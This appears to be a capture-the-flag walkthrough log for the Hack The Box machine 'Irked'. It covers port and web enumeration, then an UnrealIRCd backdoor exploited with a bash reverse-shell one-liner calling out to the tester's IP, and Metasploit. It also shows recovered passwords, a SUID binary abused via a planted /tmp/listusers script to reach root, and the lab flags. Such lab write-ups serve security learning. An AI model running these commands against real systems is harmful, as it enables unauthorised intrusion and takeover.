Machine-Name  :  Irked
IP-Address    :  10.129.99.12

Command-Line: sudo nmap -A 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-06 20:21 EST
    Nmap scan report for 10.129.99.12
    Host is up (0.076s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE VERSION
    22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
    | ssh-hostkey:
    |   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
    |   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
    |   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
    |_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
    80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp open  rpcbind 2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          34246/udp6  status
    |   100024  1          38263/tcp6  status
    |   100024  1          44584/udp   status
    |_  100024  1          49888/tcp   status
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=2/6%OT=22%CT=1%CU=40110%PV=Y%DS=2%DC=T%G=Y%TM=601F40CC
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)OPS(
    OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
    OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
    OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
    OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
    OS:S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 80/tcp)
    HOP RTT      ADDRESS
    1   75.74 ms 10.10.14.1
    2   75.98 ms 10.129.99.12

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.98 seconds





Command-Line: sudo nmap -p- -T4 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 19:54 EST
    Nmap scan report for 10.129.99.12
    Host is up (0.057s latency).
    Not shown: 65528 closed ports
    PORT      STATE SERVICE
    22/tcp    open  ssh
    80/tcp    open  http
    111/tcp   open  rpcbind
    6697/tcp  open  ircs-u
    8067/tcp  open  infi-async
    33093/tcp open  unknown
    65534/tcp open  unknown

    Nmap done: 1 IP address (1 host up) scanned in 32.27 seconds



Command-Line: sudo nmap -A -p 8067 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 20:32 EST
    Nmap scan report for irked.htb (10.129.99.12)
    Host is up (0.058s latency).

    PORT     STATE SERVICE VERSION
    8067/tcp open  irc     UnrealIRCd
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.5 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 4.14 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 8067/tcp)
    HOP RTT      ADDRESS
    1   57.68 ms 10.10.14.1
    2   57.78 ms irked.htb (10.129.99.12)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds



Command-Line: sudo nmap -A -p 6697 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 20:17 EST
    Nmap scan report for irked.htb (10.129.99.12)
    Host is up (0.058s latency).

    PORT     STATE SERVICE VERSION
    6697/tcp open  irc     UnrealIRCd
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.5 (94%), Linux 3.8 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 6697/tcp)
    HOP RTT      ADDRESS
    1   58.22 ms 10.10.14.1
    2   58.52 ms irked.htb (10.129.99.12)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 14.18 seconds




Command-Line: sudo nmap -A -p 33093 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 20:35 EST
    Nmap scan report for irked.htb (10.129.99.12)
    Host is up (0.058s latency).

    PORT      STATE SERVICE VERSION
    33093/tcp open  status  1 (RPC #100024)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 33093/tcp)
    HOP RTT      ADDRESS
    1   57.86 ms 10.10.14.1
    2   57.93 ms irked.htb (10.129.99.12)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds




Command-Line: sudo nmap -A -p 65534 10.129.99.12
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 20:39 EST
    Nmap scan report for irked.htb (10.129.99.12)
    Host is up (0.057s latency).

    PORT      STATE SERVICE VERSION
    65534/tcp open  irc     UnrealIRCd
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.5 (94%), Linux 3.8 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 65534/tcp)
    HOP RTT      ADDRESS
    1   59.69 ms 10.10.14.1
    2   60.12 ms irked.htb (10.129.99.12)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds





Command-Line: ./dirsearch.py -w /usr/share/wordlists/dirb/small.txt -e php,txt,sh -f -t 50 -u http://10.129.99.12
Result:
      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt, sh | HTTP method: GET | Threads: 50 | Wordlist size: 4790

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-02-08_18-46-31.log

    Target: http://10.129.99.12/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.99.12/_21-02-08_18-46-31.txt

    [18:46:31] Starting:
    [18:46:34] 403 -  293B  - /icons/
    [18:46:35] 301 -  313B  - /manual  ->  http://10.129.99.12/manual/
    [18:46:35] 200 -  626B  - /manual/

    Task Completed




Command-Line: ./dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e php,txt,sh -f -t 50 -u http://10.129.99.12
Result:
      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt, sh | HTTP method: GET | Threads: 50 | Wordlist size: 23053

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-02-08_18-46-10.log

    Target: http://10.129.99.12/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.99.12/_21-02-08_18-46-10.txt

    [18:46:10] Starting:
    [18:46:11] 403 -  300B  - /.htaccess.php
    [18:46:11] 403 -  295B  - /.hta.txt
    [18:46:11] 403 -  295B  - /.hta.php
    [18:46:11] 403 -  294B  - /.hta.sh
    [18:46:11] 403 -  292B  - /.hta/
    [18:46:11] 403 -  299B  - /.htaccess.sh
    [18:46:11] 403 -  300B  - /.htpasswd.php
    [18:46:11] 403 -  299B  - /.htpasswd.sh
    [18:46:11] 403 -  300B  - /.htpasswd.txt
    [18:46:27] 403 -  293B  - /icons/
    [18:46:28] 200 -   72B  - /index.html
    [18:46:32] 200 -  626B  - /manual/
    [18:46:32] 301 -  313B  - /manual  ->  http://10.129.99.12/manual/
    [18:46:40] 403 -  300B  - /server-status
    [18:46:40] 403 -  301B  - /server-status/

    Task Completed




Command-Line: ./dirsearch.py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -e php,txt,sh -f -t 50 -u http://10.129.99.12
Result:
      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt, sh | HTTP method: GET | Threads: 50 | Wordlist size: 311385

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-02-08_18-50-02.log

    Target: http://10.129.99.12/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.99.12/_21-02-08_18-50-02.txt

    [18:50:02] Starting:
    [18:50:06] 301 -  313B  - /manual  ->  http://10.129.99.12/manual/
    [18:50:06] 200 -  626B  - /manual/
    [18:50:06] 403 -  293B  - /icons/
    [18:50:34] 403 -  301B  - /server-status/
    [18:50:34] 403 -  300B  - /server-status

    Task Completed



Browser: http://10.129.99.12/manual
Result: REDIRECTED
URL: http://10.129.99.12/manual/en/index.html
Apache HTTP Server Version 2.4 Documentation




Command-Line: echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.155/9001 1>&0'" | nc 10.129.99.12 8067
Result:
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
    :irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :irked.htb 451 AB; :You have not registered

Browser: rfc irc
URL: https://tools.ietf.org/html/rfc1459
Clicked-On: Connection Registration
URL: https://tools.ietf.org/html/rfc1459
Notes: Need "PASS", "NICK", and "USER" commands with proper params passed.

Command-Line: nc 10.129.99.12 8067
Result:
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
Command-Line: PASS uk47
Command-Line: NICK uk47
Command-Line: USER uk47 NA NA :uk47:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
Command-Line: USER uk47 NA NA :uk47
Result:
    :irked.htb 001 uk47 :Welcome to the ROXnet IRC Network uk47!uk47@10.10.14.155
    :irked.htb 002 uk47 :Your host is irked.htb, running version Unreal3.2.8.1
    :irked.htb 003 uk47 :This server was created Mon May 14 2018 at 13:12:50 EDT
    :irked.htb 004 uk47 irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irked.htb 005 uk47 UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irked.htb 005 uk47 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irked.htb 005 uk47 EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    :irked.htb 251 uk47 :There are 1 users and 0 invisible on 1 servers
    :irked.htb 255 uk47 :I have 1 clients and 0 servers
    :irked.htb 265 uk47 :Current Local Users: 1  Max: 1
    :irked.htb 266 uk47 :Current Global Users: 1  Max: 1
    :irked.htb 422 uk47 :MOTD File is missing
    :uk47 MODE uk47 :+iwx
    PING :irked.htb


Command-Line: nc -lvnp 9001
Result:
    listening on [any] 9001 ...
Command-Line: echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.155/9001 1>&0'" | nc 10.129.99.12 8067
Result:
    *** REVERSE SHELL ***

ircd@irked:~/Unreal3.2$


*** METASPLOIT ***
Command-Line: msfconsole
Result:
    msf6 >

msf6 > search unreal 3.2.8.1
Result:
    Matching Modules
    ================

       #  Name                                        Disclosure Date  Rank       Check  Description
       -  ----                                        ---------------  ----       -----  -----------
       0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > use 0
Notes: Was ultimately able to get a reverse shell using this Metasploit exploit.
Result:
    ircd@irked:~/Unreal3.2$

ircd@irked:/home/djmardov/Documents$ ls -la
Result:
    ls -la
    total 16
    drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
    drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
    -rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
    -rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
Result:
    cat .backup
    Super elite steg backup pw
    UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$ su djmardov
Result:
    su djmardov
    Password: Kab6h+m+bbp2J:HG
    *** USER ACCESS ***
djmardov@irked:~/Documents$ cat user.txt
Result:
  cat user.txt
  4a66a78b12dc0e661a59d3f5c0267a8e
  *** USER OWNED ***


Attempting root access...


djmardov@irked:~/Documents$ ssh-keygen
Notes: Logged into shell using ssh-key. (/djmardov_key)
Result:
    djmardov@irked:~$


Command-Line: sudo python3 -m http.server --bind 10.10.14.155

djmardov@irked:~$ cd /dev/shm
djmardov@irked:/dev/shm$ wget 10.10.14.155:8000/LinEnum.sh
djmardov@irked:/dev/shm$ ./LinEnum.sh
Notes: Found /usr/bin/viewuser

djmardov@irked:/dev/shm$ cp /usr/bin/viewuser .
djmardov@irked:/dev/shm$ base64 -w0 viewuser
Notes: Copied the base64 encoded file to my clipboard. Pasted it in a file on my local machine.
Command-Line: nano viewuser.b64
Command-Line: bas64 -d viewuser.b64 > viewuser
Command-Line: chmod +x viewuser
Command-Line: ltrace viewuser
Result:
    __libc_start_main(0x5661957d, 1, 0xffa571c4, 0x56619600 <unfinished ...>
    puts("This application is being devleo"...This application is being devleoped to set and test user permissions
    )             = 69
    puts("It is still being actively devel"...It is still being actively developed
    )             = 37
    system("who"kali     tty1         2021-02-12 06:59
    kali     tty7         2021-02-12 06:59 (:0)
     <no return ...>
    --- SIGCHLD (Child exited) ---
    <... system resumed> )                                  = 0
    setuid(0)                                               = -1
    system("/tmp/listusers"sh: 1: /tmp/listusers: not found
     <no return ...>
    --- SIGCHLD (Child exited) ---
    <... system resumed> )                                  = 32512
    +++ exited (status 0) +++

Notes: Able to execute the file /tmp/listusers to get root shell.


djmardov@irked:/dev/shm$ nano /tmp/listusers
File-Content:
    #!/bin/bash
    echo "Sending a shell..."
    /bin/bash

djmardov@irked:~/dev/shm$ chmod +x /tmp/listusers
djmardov@irked:~/dev/shm$ ./viewuser
Result:
    *** ROOT ACCESS ***
    This application is being devleoped to set and test user permissions
    It is still being actively developed
    (unknown) :0           2021-02-12 07:09 (:0)
    djmardov pts/0        2021-02-12 07:13 (10.10.14.155)
    Sending a shell...
root@irked:/dev/shm# cat /root/root.txt
Result:
    8d8e9e8be64654b6dccc3bff4522daf3
    *** ROOT OWNED ***


      *** FINISHED ***
